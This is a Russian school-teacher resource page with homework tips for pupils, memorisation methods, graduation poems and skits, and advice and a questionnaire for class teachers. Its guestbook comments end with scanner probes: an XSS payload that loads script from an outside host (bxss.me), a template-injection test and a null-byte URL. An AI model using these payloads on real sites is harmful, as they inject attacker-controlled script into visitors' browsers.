Классные руководители 1-11 классов с целью формирования позитивного общественного мнения о лицах с особенностями психофизического развития могут организовать работу с родителями и учащимися на основе телевизионных фильмов "Каждый имеет право быть равным".Телевизионный цикл из 21 фильма размещен на сайте Представительства Детского фонда ООН (ЮНИСЕФ) в Республике Беларусь
Как готовить домашние задания
Памятка для учащихся
1. Активно работай на уроке: внимательно слушай, отвечай на вопросы.
2. Задавай вопросы, если чего-то не понял или с чем-то не согласен.
3. Точно и как можно подробнее записывай, что задано по каждому предмету.
4. Научись пользоваться словарями и справочниками. Выясняй значение незнакомых слов, находи нужные факты и объяснения, правила, формулы в справочниках.
5. Если у тебя есть компьютер, научись с его помощью находить нужную информацию, производить нужные расчеты с помощью электронных таблиц и т.п.
6. Если то, что проходили на уроке, показалось тебе трудным, повтори материал в тот же день, даже если следующий урок будет через несколько дней.
7. Приступая к выполнению каждого задания, думай не только о том, что надо сделать (то есть о содержании задания), но и о том, как (с помощью каких приемов, средств) это можно сделать.
8. В случае необходимости обращайся за помощью ко взрослым или к одноклассникам.
9. Приступая к выполнению уроков, раскрой дневник, посмотри, все ли задания записаны.
10. Продумай последовательность выполнения заданий по отдельным предметам и прикинь, сколько времени тебе понадобится для выполнения каждого задания. Убери со стола все лишнее—то, что может отвлекать. Приготовь то, что нужно для выполнения первого задания (учебник, тетради, карты, карандаши, словари, справочники и т.п.).
11. После того как подготовишься к первому уроку, все убери и приготовь то, что нужно для выполнения следующего, и т.п.
12. Между уроками делай перерывы.
13. Сначала постарайся понять материал, а затем его запомнить.
14. Прежде чем выполнять письменные задания, пойми и выучи правила, на которые оно направлено.
15. При чтении параграфа учебника задавай себе вопросы: о чем или о ком говорится в этом тексте, что об этом говорится.
16. Ищи связь каждого нового понятия, явления, о котором ты узнаешь, с тем, что ты уже знаешь. Соотноси новое с уже известным. Следи за тем, чтобы это были не случайные, внешние связи, а главные связи, связи по смыслу.
17. Если материал, который надо выучить, очень большой или трудный, разбей его на отдельные части и прорабатывай каждую часть в отдельности. Используй метод ключевых слов.
18. Не оставляй подготовку к докладам, сочинениям, творческим работам на последний день, поскольку это требует большого количества времени. Готовься к ним заранее, на протяжении нескольких дней, распределяя нагрузку равномерно.
19. При подготовке устных уроков используй карты, схемы. Они помогут тебе лучше понять и запомнить материал. К ним необходимо обращаться и при ответах на уроке.
Чем лучше ты
умеешь пользоваться картами, схемами, таблицами, тем выше будет оценка.
20. Попробуй использовать при подготовке устных заданий метод «5П», разработанный американскими психологами.1 По данным психологов США, такой метод позволяет сосредоточить внимание на самом важном в тексте и способствует лучшему его запоминанию.
21. Составляй план устного ответа.
22. Проверяй себя.
У тебя все получится!
Помни: мы лучше всего запоминаем:
—то, чем постоянно пользуемся;
—то, к чему нам надо будет вернуться (прерванные действия);
—то, что нам нужно;
—то, что мы можем связать с другими нашими знаниями и умениями;
—то, что связано с нашими переживаниями (и приятными, и неприятными).
Метод ключевых слов
Ключевые слова — самые важные в каждом абзаце.
Ключевое слово должно способствовать воспроизведение соответствующего абзаца. Вспоминая ключевые слова, мы сразу вспоминаем весь абзац.
Читая абзац, выбери для него одно-два ключевых слова.
После выбора ключевых слов запиши их в той последовательности, которая нужна для выполнения задания.
К каждому ключевому слову поставь вопрос, который позволит понять, как оно связано с соответствующим разделом текста. Обдумай и постарайся понять эту взаимосвязь.
Соедини два соседних ключевых слова с помощью вопросов.
После соединения каждого ключевого слова со своим разделом текста и с последующим ключевым словом образуется цепочка.
Запиши эту цепочку и постарайся ее выучить.
Перескажи текст, опираясь на эту цепочку.
Метод «5 П»
1П — Просмотри текст (бегло)
2П — Придумай к нему вопросы
3П — Пометь карандашом самые важные места
4П — Перескажи текст
5 П — Просмотри текст повторно
Пожелания детям от классных руководителей
Дорогие мои взрослые дети!
Сегодня мы вас проважаем
В большую жизнь. А что вней ждет?
На светлый путь благославляем.
И пусть удача к вам придет.
Надеяться на вас мы смеем,
В душе лелея мысль такую,
Что с вами мир станет добрее,
И здравый смысл восторжествует.
Хочу, чтоб вам дерзать хотелось,
Чтоб вы творили и мечтали
И чтоб азарт, упорство, смелость
В делах всегда сопровождали.
Мой уходящий выпускной класс -
Строгий критик и ценитель,
Задорный, юный, озорной,
В тебя я верю как учитель.
От всей души, со всей любовью,
Вас поздравляю нынче я,
Желаю счастья всем, здоровья.
И в добрый путь, мои друзья!
Пожелания детям от родителей
Мама. Мы - счастливые родители, дорогие наши дети, и сегодня мы хоти поблагодарить тех, кто чуточку приблизил вас к мечте, кто отдал вам не только свои знания, но и свое сердце. Огромное родительское спасибо Вам, дорогие учителя ( вручает хлеб учителям и директору)
Папа Перед тобой сейчас, поверь,
В большую жизнь открыта дверь.
За ней - нелегкие пути,
И вам по ним вперед идти.
Из множества земных дорог
Одну ты выбрать поспеши.
Пусть этот выбор будет строг,
А мы желаем от души
Все в жизни лучшее познать.
Уметь любить, страдать, мечтать,
Людей в беде не покидать
И злом на зло не отвечать.
Мама С добром в душе старайтесь жить,
Обиду долго не хранить,
Не предавать друзей своих,
Ведь трудно в в жизни нам без них.
Любовь пусть в сердце не остынет,
Пускай удача не покинет,
И чуждою жестокость станет.
А птица счастья не обманет.
Еще хотим мы пожелать
Смелее по земле шагать,
Учителей не забывать
И добрым словом вспоминать.
Уважаемые классные руководители!
Ваш труд почетен, благороден,
Он знаний требует больших!
Вы дали нашим детям в Жизнь дорогу,
Мы знаем, Вы любили их!
Сегодня от души хотим мы вас поздравить,
Вы классные! Творите только добрые дела!
Вы искренни, ответственны, надежны
За это честь Вам и огромная хвала!
Поверьте, мы Вас очень уважаем,
За строгость, и за дельные советы!
Умы Вы наши наполняли знаньями:
Оценки, шалости –
На все были ответы.
Учили думать нас открыто, смело.
Дарили мудрость детям, а родителям терпенье
Спасибо классные за это.
Поклон Вам за старанье и уменье
Мы все родители желаем вам здоровья,
Невзгоды мимо Вас пускай пройдут!
Улыбкой мир для Вас пусть будет полон,
Оплачен хорошо Ваш благородный труд!
Успехов Вам и творчества желаем!
Учеников пытливых и послушных,
Поменьше недовольных, равнодушных!
Любви, цветов и красоты,
Пусть высоко оценят все Ваши труды!
Выступление учителей
«Мы вам вот что сказать хотим...».
Целый год под этой крышей
Жил одиннадцатый класс.
С каждым днем все выше, выше
Становился он у нас.
На глазах они умнели
И взрослели с каждым днем,
А теперь мы нашим деткам
Аттестаты выдаем!
Как не вспомнить нам девчонок –
В голове – одни мечты!
Как бы строем их отправить
Всех на конкурс красоты!
И какая тут учеба?
Все сияет и блестит:
Губки, щечки, глазки в краске.
Глянешь – сердце защимит.
Как не вспомнить нам мальчишек,
С кем ты столько воевал!
В доску глядя, что есть мочи,
Кто из трубочек стрелял?
И хотели б мы, ребята,
Пожелать вам в этот час
Приходить сюда почаще,
Вспоминать почаще нас!
Здесь вас помнят,
Здесь вас любят.
Каждый класс, как дом родной...
Ну, а мы, все педагоги,
Как всегда, за вас горой!
Выступление классных руководителей.
Не торопитесь уходить!
Постойте у открытой двери.
Нельзя же с легкостью забыть
Тех, кто вас любит, кто вам верит.
Не торопитесь отвергать,
Когда вам душу открывают.
Достаньте мудрости печать,
Сумейте просто промолчать,
Вы ведь умеете, я знаю!
Не торопитесь разлюбить,
Все чувства сразу отвергая,
Тепла вам может не хватить,
Чтоб отчужденья лед растаял.
Не торопитесь успевать.
Найдите миг остановиться,
А вдруг получится узнать
И там, где ждали, появиться.
Не торопитесь все забыть,
От вздорной мысли отмахнуться.
Как нелегко все возвратить,
Как нелегко назад вернуться...
Не торопитесь уходить...
Классные руководители
Дай вам Боже чуть побольше счастья и любви.
И друзей хороших тоже, чтоб не подвели!
Чтоб дорога вашей жизни
Привела бы вас к мечте.
Добивайтесь, не сдавайтесь никогда, нигде!
Дай вам Боже быть мудрее и сильнее быть.
Дай к друг другу быть добрее, научи любить.
Светлый путь пусть освещает путеводная звезда!
Чтоб не знали вы несчастий!
Будьте счастливы всегда!
В семьях чтобы вечно были счастье и успех!
И почаще вспоминайте школу и нас всех.
Красота, добро, надежда, радость, вера и любовь
Вашу жизнь пусть украшают, –
Мы желаем вновь и вновь.
Классные руководители.
Вам открыты все пути-дороги,
Надо смело выбрать и решить,
Только тайну отчего порога
Не спешите вы переступить.
Звезды доставать учитесь сами,
Неба не пугайтесь синевы!
Будьте, парни, гордыми орлами!
Чайками, девчонки, будьте вы!
Гнезд своих родных не забывайте,
Как бы ни были дни в жизни веселы,
Прилетайте в гости, прилетайте,
Прилетайте, чайки и орлы!
Но сколь чего ни длилось бы,
А все конец случается.
И верим, что экзамены
Сдадут наверняка. Теперь пора их школьная,
И детская, и вольная,
Проходит и кончается,
Настал черед последнего,
А может, не последнего,
А только предпоследнего
Последнего звонка!
К Последнему звонку
Сценка "Божественная комедия".
Табличка на ширме "Небесная канцелярия".
За ширмой сидят классные руководители, ангел и черт.
Перед ширмой сидит Бог.
Бог
(читает). "Заявка. Администрация школы № _ убедительно просит Вас прислать классного руководителя на 5-9 класс.
Чтоб женщиной была, наукой чтоб владела,
Чтобы классною была и за детьми смотрела.
(звонит) Але, справочная? Что такое классный?
Справочная.
Это мама с добрыми лучистыми глазами.
Это тот, кто в школьной жизни самый главный.
Это сердце, отданное детям без остатка.
Рядом с ним все будни - это просто сказка.
Бог.
Что ж придется подсобить:
маму классную слепить!
Эй ты ангел, эй ты черт!
(из-за ширмы появляются ангел и черт)
Вас уж ждет работа.
Командовать тут буду я -
Мне чудо сотворить охота!
Материал исходный вот ( протягивает тесто)
Лепите, поспешайте!
пусть все в нее от нас войдет.
Приступим, помогайте!
( под музыку лепят)
Ангел.
Готовы руки, голова ( из-за ширмы появляются руки и головы классных руководителей)
Черт.
И ноги на подходе ( под ширмой появляются ноги)
Бог.
Пусть будет школа ей семьей,
Успехов ей в работе.
Ангел.
Пусть деткам песенки поет,
На инструментах пусть играет.
Черт.
И про вампиров перед сном
С охотою читает.
Бог.
Гибкий стан ей создадим.
А дальше - пусть следит за ним.
Ангел.
Пусть спортом увлекается.
Черт.
И в мужиков влюбляется.
Ангел.
Пусть будет обаятельной.
Бог.
А также привлекательной.
Черт.
Немного чертовщинки
Добавим обязательно.
Ангел.
Немного меланхолии,
Побольше оптимизма.
Черт.
И подбросим в это
Граммульку эгоизма.
Ангел.
Ну, слава Богу, молодцы -
быстро все слепили,
Бог.
Да только вот талант большой
Дать ей позабыли.
Ангел.
Ну как детьми-то управлять?
Придется пряник свой отдать.
Черт.
А я добавлю к нему кнут.
Бог.
А я ей дам такое сердце ,
Чтоб поделиться им могла,
Чтоб его на всех хватило.
Пусть вселится в него душа.
Ну что же, чудеса свершились.
Классные мамы у нас получились.
Давно мы сроднились, вы стали нам мамой второю,
И нам было грустно расстаться хотя бы на день.
Но время идет, и бежит очень быстро порою,
Сегодня меж нами встает расставания тень.
И все у нас было: взаимные ссоры, обиды,
Заносчивость, лень и безграмотность, жуткий ответ,
Но надо прощать, и в этом мы мнении едины,
И мы понимаем: труднее профессии нет.
И каждый учитель, конечно, нам стал уже дорог,
И каждый частицу себя оставляет в сердце у нас,
Но классным своим говорим мы "спасибо" особо,
И всех педагогов мы помним, и вы вспоминайте о нас.
Спецэффектная жизнь жизнь, технологий обвал,
Теле-, видеобум, информационная масса,
Перфокарты, компьютер, дисплей, терминал,
И при этом при всем ты один перед классом.
И не будет работать ничто без тебя,
И никто не подскажет, никто не обучит,
И навряд ли компьютер полюбит ребят...
Человек образованный все-таки лучше.
СКАЗКА О ЗОЛОТОЙ РЫБКЕ
(Сказка классных руководителей)
1 Садитесь, друзья, поудобней,
Мы вам расскажем сказку –
Старую, мудрую сказку
О Золотой рыбке.
2 У самого синего моря
Жили две классных мамы
И два еще классных папы.
3 Дети у них были разные –
А вот заботы общие.
И от забот этих тяжких
У них голова болела
И днем, и позднею ночью.
4 Пошли они к синему морю,
Чтобы забросить невод
В надежде на то, что поймают
Они Золотую рыбку.
5 Идут они к синему морю,
И каждый думает думу:
О чем он попросит Рыбку,
Какое желанье исполнить?
6 Я сказала бы:
Рыбка!
Государыня Золотая!
Сделай так, чтобы дети
Свои подтвердили медали!
7 А я бы взмолился:
Рыбка!
Медалистов нет – и не надо!
Сделай такое чудо,
Чтобы ЕГЭ все сдали!
8 А я бы пришел с поклоном:
Государыня Рыбка!
Пусть наши дети поступят
В вузы – и лучше бесплатно!
9 А я попросила бы Рыбку:
Смилуйся, государыня!
Может, хочу слишком много, –
Чтобы когда-нибудь в школу
Пришли они с добрым словом!
10 И вот они в синее море
Раз закинули невод –
Пришел он с одною тиной.
11 В другой раз закинули невод –
Пришел он с травою морскою.
12 В третий раз, наконец-то,
Попалась Рыбка Золотая
И голосом молвит человечьим:
13 «Чего вам надобно, люди?»
14 Бухнулись перед нею
Классные мамы на колени,
15 Взмолились классные папы:
«Государыня Рыбка!
Не надо нам ни нового корыта,
Ни дворцов, ни дворянства,
Ты помоги нам исполнить
Наши заветные желания!»
16 Послушала всех их Рыбка
И отвечала тихо:
«Сколько вы лет их учили?
Сколько вы сил в них вложили?
Разве не вашей рукою
Каждый дневник исписан?
Разве не вашей ногою
К классу маршрут проложен?
Разве уста не ваши
На классных часах вещали?
Разве звонки не ваши
Родителей доставали?
Остался всего лишь месяц!
Что ж вам никак неймется?!
17 И без меня они смогут
Экзамены сдать успешно.
И без меня получат
Медали свои золотые.
И без меня поступят –
Не зря же вы их учили.
18 А вот придут ли в школу
Когда-нибудь с добрым словом,
Сейчас вам никто не скажет,
Это время покажет.
19 Теперь же ступайте с богом,
Терпения наберитесь
И в сердце своем храните
Веру, Любовь и Надежду!»
«Молитва»
(Исполняют классные руководители и ансамбль)
Грустной музыкой звонка
День над нами проплывает,
Он не закончился пока –
Но скоро он растает
Грустной музыкой звонка…
В свой сердечный круг друзей
Тех, кто дорог, принимаю.
В водовороте школьных дней
Все больше понимаю,
Как мне нужен круг друзей.
Припев:
О боже, дай мне сил,
Что задумано, успеть,
Ни о чем не сожалеть.
О, боже, дай мне сил
И терпенья одолжи
Против зависти и лжи,
Зависти и лжи.
Время, словно карусель,
Закружить легко нас может,
И блеском призрачных огней
Покой и сон тревожит
Время, словно карусель.
Сколько в сердце свежих ран
От потерь и сожалений!
Но никому я не отдам
Надежду – путь к спасенью, –
Никому я не отдам!
Припев.
Дорогой выпускник!
Будь беспокойным! Не считай отрадой
Благополучья собственного рай!
Дерзай! Работай! Ошибайся! Падай!
И снова все сначала начинай!
Не так легко, не так все это просто.
Но пусть в тебе горит огонь живой
Огромного, святого недовольства
Самим собой!
Слова учителя
Как грустно в зале в этот день весенний,
Своих питомцев видеть нам опять.
Для них настал, действительно, последний
Их школьный день, не повернуть все вспять.
Вас от души мы поздравляем,
Промчалась школьная пора.
Так в добрый путь, и пожелаем
Ни пуха в жизни вам и ни пера.
Но что грустить о прожитом напрасно?
Ведь налицо пред нами результат.
И юношам, и девушкам прекрасной
Необходимо жизни пожелать.
И пусть все будет так, как вам хотелось,
Экзамены успешно в школе сдать,
Чтоб в жизни так работалось, как пелось,
А главное, себя не потерять.
Итог работы нашей стал виднее,
И вот момент прощания настал,
И нет сейчас мгновения важнее,
Чтобы звонок последний прозвучал.
Пожелание
Пожелаем Вас всем широкой дороги,
Поменьше ненастья,
Чтоб у каждого было настоящее счастье.
А над городом вновь опускается вечер,
Отзвенела гитара, и балу - отбой!
Хоть немного тепла этой памятной встречи
Унесите с собой, унесите с собой!!!
И не будем давать обещаний трескучих,
Громких слов говорить, клятв высоких давать.
Просто жить на земле постараемся лучше,
Чтобы школьный престиж никогда не терять.
Щенок, воспитанный пинком,
Не будет преданным щенком.
Ты после грубого пинка
Попробуй, подзови щенка.
Где раздают щенкам пинки,
Там воспитатели – пеньки.
С. Михалков
· Думайте о своих отношениях с детьми, выстраивайте их.
· Помните, что психологическая атмосфера в детском коллективе, прежде всего, зависит от отношения к человеку, как высшей ценности.
· Умейте слушать детей.
· Не забывайте, что у детей могут быть конфликты, и что вы можете спровоцировать их своей педагогической несостоятельностью.
· Обращайте внимание в общении на особенности девочек. Они более эмоциональны, ранимы.
· Преодолевайте отрицательное отношение к некоторым ребятам.
· При общении с детьми педагог не должен забывать об эмпатии (сочувствие, сопереживание ребенку) и педагогической рефлексии (объективной оценки себя, самоконтроль).
· При работе с «трудными» подростками следует так организовывать деятельность, при которой «трудному» ребенку был бы гарантирован успех, как следствие, уважение сверстников, то есть обеспечить «ситуацию успеха».
· Помните, что преподаватель должен быть творческой личностью, «исследователем», а не простым «урокодателем», обезличенным носителем информации».
· Чаще улыбайтесь детям. Школа, лишенная оптимизма, деградирует и умирает, преподаватель, не видящий перспективы своих отношений с детьми, не верящий в их способности, не может научить их даже таблице умножения.
Помните, что основой нравственности на Руси всегда была вера в Бога и труд.
РЕКОМЕНДАЦИИ К ПРОВЕДЕНИЮ КОНСУЛЬТАЦИЙ
(с родителями)
Результаты консультации не должны стать темой обсуждения посторонних людей.
Кодекс классного руководителя
Классный руководитель – это не работа, это образ жизни.
Советы, рекомендации, предостережения классному руководителю:
1. Во взаимодействии и взаимоотношениях с воспитанниками должно быть меньше формализма, больше человеческого общения.
2. Главное – не воспитывать ребят, а жить с ними совместной деятельностью тот отрезок времени, который вам выпало быть вместе. При этом к воспитанникам относись так, как хочешь, чтобы они относились к тебе.
3. Учащиеся, не нашедшие подтверждения своих способностей к обучению хотя бы по одному предмету, теряют интерес к школе вообще.
4. Лучше больше хвалить и меньше ругать; исповедуй педагогику успеха – она приносит хорошие результаты.
5. Силы и время, потраченные на организацию насыщенной классной жизни, на культурное развитие учеников, никогда не будут потрачены напрасно.
6. Главное – найти какое-либо интересное дело, в которое ты можешь вовлечь детей, стать им интересным, тогда они будут к тебе прислушиваться, им будет интересно с тобой, а тебе интересно с ними.
7. Родитель ребенка – не твой ученик, не твой враг, а друг, советчик, единомышленник.
8. Лучшая форма взаимоотношений с родителями: дети – родители – учитель – семья.
9. Главное – не жди прямых актов благодарности, тогда не будет разочарований.
10. Дети в классе – твое отражение; старайся постоянно работать над собой.
11. Главное – сохраняй молодость души на долгие годы, тогда тебе легче будет понять юных, рядом с которыми должна состояться твоя счастливая профессиональная карьера.
АНКЕТА ДЛЯ классных РУКОВОДИТЕЛЕЙ
1. Привлекает ли Вас работа классного руководителя или Вы отказались бы от неё, если была бы такая возможность?
2. В чем, по Вашему мнению, заключается сложность работы классного руководителя?
3. Какую конкретную помощь в организации своей работы с классом Вы хотели бы получить:
– в планировании;
– в выборе форм и методов;
– в изучении ученического коллектива;
– в работе с родителями, учителями, общественными организациями;
– в другом (укажите, в чем именно)_____________________.
4. Если бы Вы были членом администрации учебного заведения, какие бы изменения в организацию воспитательной работы внесли?
5. С какими трудностями Вы сталкиваетесь, работая с классом? В чем видите их причину?
6. Что Вам лучше всего удается в Вашей работе с классом?
7. Какие качества поведения, черты характера Ваших ребят больше всего Вас огорчают?
8. Какие качества поведения, черты характера Ваших ребят больше всего Вас радуют?
9. Каким опытом Вы могли бы поделиться с коллегами?
10. Ваши пожелания и предложения.
Портфолио классного руководителя
Предлагаем вам познакомиться с очень интересными и полезными материалами:
Современное поколение, какое оно: тематика и содержание бесед для учащихся.
Беседы объединены рубриками:
Наш адрес: г. Бобруйск
б-р Приберезинский 27
You can do it, too! Sign up for free now at https://www.jimdo.com
e (Sunday, 10 February 2019 02:36)
1
e (Sunday, 10 February 2019 02:33)
1'"
e (Wednesday, 31 October 2018 10:18)
1
e (Wednesday, 31 October 2018 10:17)
1'"()&%<acx><ScRiPt >Akbs(9881)</ScRiPt>
e (Wednesday, 31 October 2018 10:14)
1'"
e (Wednesday, 31 October 2018 10:13)
</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013651&r=1920-199&h=1920-d7f77-2&/).slice(2),document.documentElement.appendChild(s))//'>
e (Wednesday, 31 October 2018 10:12)
add
e (Wednesday, 31 October 2018 10:11)
${9999333+9999152}
e (Wednesday, 31 October 2018 10:11)
http://testasp.vulnweb.com/t/xss.html?%00.jpg
света (Wednesday, 16 November 2016 05:07)
спасибо вам большое
Елена (Friday, 08 July 2016 20:20)
Спасибо.
Ирина (Thursday, 15 October 2015 07:16)
Большое спасибо за необходимую информацию! То, что надо
Людмила (Friday, 08 May 2015 17:57)
Огромное спасибо!
Людмила (Saturday, 21 February 2015 05:25)
Вы такая, МОЛОДЕЦ! Так держать!!! Спасибо огромное!!!
Евгения (Sunday, 16 November 2014 11:39)
Огромное спасибо за сайт!Столько полезной информации по очень интересующей меня теме!!
12 (Wednesday, 24 September 2014 10:14)
Спасибо